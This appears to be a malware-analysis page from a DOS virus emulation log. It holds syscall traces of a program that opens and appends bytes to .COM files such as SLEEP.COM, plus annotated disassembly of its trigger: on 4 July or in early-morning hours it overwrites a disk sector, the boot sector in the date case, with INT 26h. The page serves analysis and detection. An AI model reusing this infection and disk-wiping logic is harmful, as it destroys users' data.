2018-12-25T11:44:30.477096184Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:30.726095059Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:30.733881292Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:30.74201072Z 62 PC: 14190 | Close file
2018-12-25T11:44:30.752095326Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.755438266Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.764150826Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.771774233Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.773817467Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.776795892Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.786760963Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.789484576Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.798147815Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.810287858Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.815937843Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.824416562Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.83322577Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.836256035Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.83989212Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.849158674Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.851137298Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.86056808Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.870754507Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.87407144Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.882287848Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.88763602Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.898733099Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.906517841Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.925298185Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.928025047Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.936779858Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.946253053Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.949422251Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.956883822Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.96403624Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.965413843Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.968657565Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.978483605Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.980304732Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.987608162Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.997324253Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.000247713Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.006270583Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.011157106Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:31.012765324Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:31.016246419Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.026182553Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.027971408Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.035734559Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.045668992Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.049032176Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.057586447Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.064928487Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:31.067376936Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:31.070911888Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.081239821Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.08330868Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.09027581Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.098123597Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.100953923Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.10679352Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.109277394Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.111584943Z 79 PC: 1419c | Find next file (See above)
; Trigger check reached right after the last "Find next file" row. The row below is the
; return from INT 21h AH=2Ah (logged as op 42, Get date): DL = day, DH = month.
; On 4 July, AX is zeroed and control jumps to 0x1426f; on any other date the clock is read
; and tested instead. The next logged call in this run is Get time at PC 14255, so the
; date test did not match here.
2018-12-25T11:44:31.113833742Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4  ; day == 4 ?
0x14245: jne 0x14251  ; no -> fall back to the clock test
0x14247: cmp dh, 7  ; month == 7 ?
0x1424a: jne 0x14251  ; no -> fall back to the clock test
0x1424c: xor ax, ax  ; date matched: AX = 0
0x1424e: jmp 0x1426f  ; 0x1426f (visible in the Get time rows) copies AX into DX ahead of INT 26h
0x14250: nop
0x14251: mov ah, 0x2c  ; INT 21h AH=2Ch, get time (logged as op 44)
0x14253: int 0x21  ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; sets ZF for a test past the end of this window
; Return from INT 21h AH=2Ch (logged as op 44, Get time): CH = hour, CL = minute,
; DH = second, DL = 1/100 s. When the minute is 0 and the hour is below 6, a sector number
; is derived from the clock and one sector is written to the default drive with INT 26h
; (DOS absolute disk write: AL = drive, CX = sector count, DX = first logical sector,
; DS:BX = buffer). That raw write is the destructive payload; it bypasses the file system,
; so an INT 26h issued by a .COM program is a high-signal behaviour to alert on.
; The next logged call in this run is Get time at PC 14283, i.e. one of the two branches to
; 0x1427c was taken and the write was skipped.
2018-12-25T11:44:31.115990549Z 44 PC: 14255 | Get time 0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; clock-derived value == 0 ?
0x1426c: jne 0x1426f
0x1426e: inc ax  ; force it to 1, so the clock path never selects sector 0
0x1426f: mov dx, ax  ; DX = first sector to overwrite; also the target of the date check's jmp at 0x1424e, which arrives with AX = 0 (logical sector 0, the boot sector)
0x14271: mov cx, 1  ; one sector
0x14274: xor bx, bx  ; buffer offset 0, i.e. DS:0000
0x14276: mov ah, 0x19  ; INT 21h AH=19h, get default drive -> AL
0x14278: int 0x21
0x1427a: int 0x26  ; absolute disk write with the registers set up above
0x1427c: mov bx, 0x31a  ; target of the two bypass branches above; BX = 0x31a
; Return from a second Get time call (logged as op 44 at PC 14283). Only DH (seconds) is
; used, as a cheap pseudo-random index: it is reduced below the byte at [0x319], doubled,
; and added to BX (loaded with 0x31a at 0x1427c) to fetch a word that is then passed in DX
; to INT 21h AH=09h (print '$'-terminated string). The byte stored just before that string
; selects the follow-up action.
; NOTE(review): reading [0x319] as an entry count and 0x31a as a table of string pointers
; is inferred from how they are used here; their contents are not shown on this page.
2018-12-25T11:44:31.119746615Z 44 PC: 14283 | Get time 0x14283: inc dh  ; seconds + 1
0x14285: cmp dh, byte ptr [0x319]  ; index below the limit byte?
0x14289: jl 0x14291  ; yes (signed compare) -> use it
0x1428b: sub dh, byte ptr [0x319]  ; no -> subtract the limit and test again (modulo by repeated subtraction)
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al  ; CL keeps a copy of the index; its use is outside this window
0x14295: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14296: shl ax, 1  ; index * 2: entries are words
0x14298: add bx, ax  ; BX = 0x31a + 2 * index
0x1429a: mov si, word ptr [bx]  ; SI = selected table entry
0x1429c: mov ch, byte ptr [si - 1]  ; CH = byte immediately before the address in SI
0x1429f: mov dx, si
0x142a1: mov ah, 9  ; INT 21h AH=09h, print string at DS:DX up to '$'
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20  ; CH == 0: terminate the program
0x142ac: cmp ch, 1  ; other CH values are handled past the end of this window
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1829,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:44:30.588537518Z 26 PC: 14146 | Set disk transfer address
2018-12-25T11:44:30.59079266Z 78 PC: 1419c | Find first file
2018-12-25T11:44:30.598459344Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:44:30.605749764Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:44:30.613898789Z 66 PC: 141ce | Move file pointer
2018-12-25T11:44:30.615415288Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:30.618196347Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T11:44:30.726148512Z 66 PC: 141f6 | Move file pointer
2018-12-25T11:44:30.732784328Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:44:30.740376702Z 62 PC: 14190 | Close file
2018-12-25T11:44:30.74957559Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.753857039Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.76114407Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.768232431Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.771098669Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.774527057Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.783771287Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.786379629Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.795547932Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.804653759Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.808914384Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.817475211Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.824793888Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.827000063Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.830962884Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.840167834Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.842173867Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.849931861Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.859833281Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.863113971Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.871298401Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.878597705Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.880388833Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.884661846Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.893758706Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.895524296Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.903958866Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.913079485Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.916035367Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.926240054Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.935295271Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.936856604Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.94000758Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:30.949358631Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:30.950830486Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:30.958119589Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:30.970957756Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:30.973668631Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:30.980482628Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:30.988824997Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:30.992087716Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:30.995460606Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.006337568Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.007915329Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.016947898Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.02707995Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.03159488Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.039262143Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.047160697Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T11:44:31.049586126Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T11:44:31.052522456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T11:44:31.062046935Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T11:44:31.064741381Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T11:44:31.072131275Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.08129948Z 79 PC: 1419c | Find next file (See above)
2018-12-25T11:44:31.084985114Z 61 PC: 141a8 | Open file (See above)
2018-12-25T11:44:31.092932334Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T11:44:31.095993376Z 62 PC: 14190 | Close file (See above)
2018-12-25T11:44:31.098814836Z 79 PC: 1419c | Find next file (See above)
; Trigger check reached right after the last "Find next file" row. The row below is the
; return from INT 21h AH=2Ah (logged as op 42, Get date): DL = day, DH = month.
; On 4 July, AX is zeroed and control jumps to 0x1426f; on any other date the clock is read
; and tested instead. The next logged call in this run is Get time at PC 14255, so the
; date test did not match here.
2018-12-25T11:44:31.102131608Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4  ; day == 4 ?
0x14245: jne 0x14251  ; no -> fall back to the clock test
0x14247: cmp dh, 7  ; month == 7 ?
0x1424a: jne 0x14251  ; no -> fall back to the clock test
0x1424c: xor ax, ax  ; date matched: AX = 0
0x1424e: jmp 0x1426f  ; 0x1426f (visible in the Get time rows) copies AX into DX ahead of INT 26h
0x14250: nop
0x14251: mov ah, 0x2c  ; INT 21h AH=2Ch, get time (logged as op 44)
0x14253: int 0x21  ; returns CH = hour, CL = minute, DH = second, DL = 1/100 s
0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; sets ZF for a test past the end of this window
; Return from INT 21h AH=2Ch (logged as op 44, Get time): CH = hour, CL = minute,
; DH = second, DL = 1/100 s. When the minute is 0 and the hour is below 6, a sector number
; is derived from the clock and one sector is written to the default drive with INT 26h
; (DOS absolute disk write: AL = drive, CX = sector count, DX = first logical sector,
; DS:BX = buffer). That raw write is the destructive payload; it bypasses the file system,
; so an INT 26h issued by a .COM program is a high-signal behaviour to alert on.
; The next logged call in this run is Get time at PC 14283, i.e. one of the two branches to
; 0x1427c was taken and the write was skipped.
2018-12-25T11:44:31.10494908Z 44 PC: 14255 | Get time 0x14255: or cl, cl  ; minute == 0 ?
0x14257: jne 0x1427c  ; minute != 0 -> bypass the disk write
0x14259: cmp ch, 6
0x1425c: jge 0x1427c  ; hour >= 6 (signed compare) -> bypass the disk write
0x1425e: add cl, ch  ; CL was 0 on this path, so CL = hour
0x14260: mov ax, cx
0x14262: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14263: add al, dh  ; + seconds
0x14265: adc al, dl  ; + hundredths, plus carry from the previous add
0x14267: adc ah, 0  ; propagate carry into the high byte
0x1426a: or ax, ax  ; clock-derived value == 0 ?
0x1426c: jne 0x1426f
0x1426e: inc ax  ; force it to 1, so the clock path never selects sector 0
0x1426f: mov dx, ax  ; DX = first sector to overwrite; also the target of the date check's jmp at 0x1424e, which arrives with AX = 0 (logical sector 0, the boot sector)
0x14271: mov cx, 1  ; one sector
0x14274: xor bx, bx  ; buffer offset 0, i.e. DS:0000
0x14276: mov ah, 0x19  ; INT 21h AH=19h, get default drive -> AL
0x14278: int 0x21
0x1427a: int 0x26  ; absolute disk write with the registers set up above
0x1427c: mov bx, 0x31a  ; target of the two bypass branches above; BX = 0x31a
; Return from a second Get time call (logged as op 44 at PC 14283). Only DH (seconds) is
; used, as a cheap pseudo-random index: it is reduced below the byte at [0x319], doubled,
; and added to BX (loaded with 0x31a at 0x1427c) to fetch a word that is then passed in DX
; to INT 21h AH=09h (print '$'-terminated string). The byte stored just before that string
; selects the follow-up action.
; NOTE(review): reading [0x319] as an entry count and 0x31a as a table of string pointers
; is inferred from how they are used here; their contents are not shown on this page.
2018-12-25T11:44:31.108602015Z 44 PC: 14283 | Get time 0x14283: inc dh  ; seconds + 1
0x14285: cmp dh, byte ptr [0x319]  ; index below the limit byte?
0x14289: jl 0x14291  ; yes (signed compare) -> use it
0x1428b: sub dh, byte ptr [0x319]  ; no -> subtract the limit and test again (modulo by repeated subtraction)
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al  ; CL keeps a copy of the index; its use is outside this window
0x14295: cwde  ; one-byte opcode in 16-bit code, so it executes as cbw (AX = sign-extended AL); NOTE(review): "cwde" looks like a disassembler labelling artifact
0x14296: shl ax, 1  ; index * 2: entries are words
0x14298: add bx, ax  ; BX = 0x31a + 2 * index
0x1429a: mov si, word ptr [bx]  ; SI = selected table entry
0x1429c: mov ch, byte ptr [si - 1]  ; CH = byte immediately before the address in SI
0x1429f: mov dx, si
0x142a1: mov ah, 9  ; INT 21h AH=09h, print string at DS:DX up to '$'
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20  ; CH == 0: terminate the program
0x142ac: cmp ch, 1  ; other CH values are handled past the end of this window
0x142af: jne 0x142b2